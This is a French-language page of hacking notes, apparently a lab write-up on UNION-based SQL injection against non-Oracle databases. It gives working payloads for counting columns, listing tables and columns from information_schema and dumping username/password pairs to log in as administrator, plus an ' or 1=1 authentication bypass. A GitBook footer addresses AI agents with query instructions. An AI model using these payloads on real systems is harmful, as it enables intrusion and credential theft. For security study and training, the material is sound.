> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/sql-injection/non-oracle-database-enumeration.md).

# Énumération des bases de données non Oracle

### Attaque par injection SQL, répertorier le contenu de la base de données sur des bases non Oracle

#### Contexte

* Paramètre vulnérable : `category` filtre (injection via `WHERE`).
* L'application renvoie les résultats SQL dans la réponse, ce qui permet `UNION`l'extraction basée sur

#### Objectif

* Identifiez le nom de la table contenant les identifiants, découvrez ses colonnes, extrayez `le nom d'utilisateur` / `mot de passe` les paires et connectez-vous en tant que `administrateur`.

#### Méthodologie (phases concises)

1. **Déterminer le nombre de colonnes**/ Exemple :

   ```sql
   ' ORDER BY 2-- -
   ' ORDER BY 3-- -
   ```

* Augmentez l'index jusqu'à provoquer une erreur → connaître le nombre de colonnes pour `UNION`.

2. **Valider `UNION SELECT`**/ Exemple (2 colonnes) :

   ```sql
   ' UNION SELECT '1','2'-- -
   ```

* Adaptez-vous aux N colonnes renvoyées (utilisez `NULL` pour les colonnes non pertinentes).

3. \*\* Liste des tables\*\* (base non Oracle — `information_schema`)

   ```sql
   ' UNION SELECT NULL, table_name
     FROM information_schema.tables
     WHERE table_schema = 'public'-- -
   ```

* Permet de lister les tables dans le `public` schéma (compatible Postgres/MySQL).

4. Lister les colonnes d'une table identifiée

```sql
' UNION SELECT NULL, column_name
  FROM information_schema.columns
  WHERE table_schema = 'public' AND table_name = 'users_arejzy'-- -
```

* Remplacez `users_arejzy` par la table découverte.

5. Extraire le contenu (dump)

Exemple (colonnes identifiées password/ qxbwwb, username/ lidnwi) :

```sql
' UNION SELECT password_qxbwwb, username_lidnwi
  FROM users_arejzy-- -
```

* Ajustez l'ordre/le type des colonnes selon la requête vulnérable (utilisez `CAST`/`CONCAT`/`NULL` si nécessaire).

6. Contournement / connexion

* Une fois le nom d'utilisateur = administrator et le mot de passe récupérés, connectez-vous via la page d'authentification.
* Sinon, utilisez une charge utile de contournement d'authentification si la table n'est pas directement accessible (par ex. username = ' or 1=1-- -), mais l'exfiltration directe est préférable comme preuve.

#### Résultat attendu

* Liste des noms de tables, des colonnes, puis vidage des identifiants.
* Connexion réussie en tant que `administrateur` en utilisant les identifiants exfiltrés.

#### Impact

* Compromettre des comptes (escalade complète si admin), extraire des informations sensibles, modification/suppression de données, extorsion possible.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/sql-injection/non-oracle-database-enumeration.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
